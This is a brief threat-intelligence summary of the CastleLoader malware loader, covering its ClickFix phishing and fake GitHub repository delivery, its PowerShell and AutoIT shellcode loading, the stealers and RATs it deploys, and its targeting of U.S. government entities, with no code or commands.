CastleLoader, a versatile malware loader, has infected 469 devices since May 2025 using Cloudflare-themed ClickFix phishing and fake GitHub repositories. It delivers information stealers and RATs, with a 28.7% infection rate. The malware employs sophisticated techniques, including PowerShell and AutoIT scripts, to load shellcode into memory and connect to C2 servers. CastleLoader's modular design allows deployment of multiple payloads, including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader, and SectopRAT. Its campaigns target U.S. government entities and use legitimate file-sharing services and compromised websites for payload retrieval, enhancing resilience against takedowns.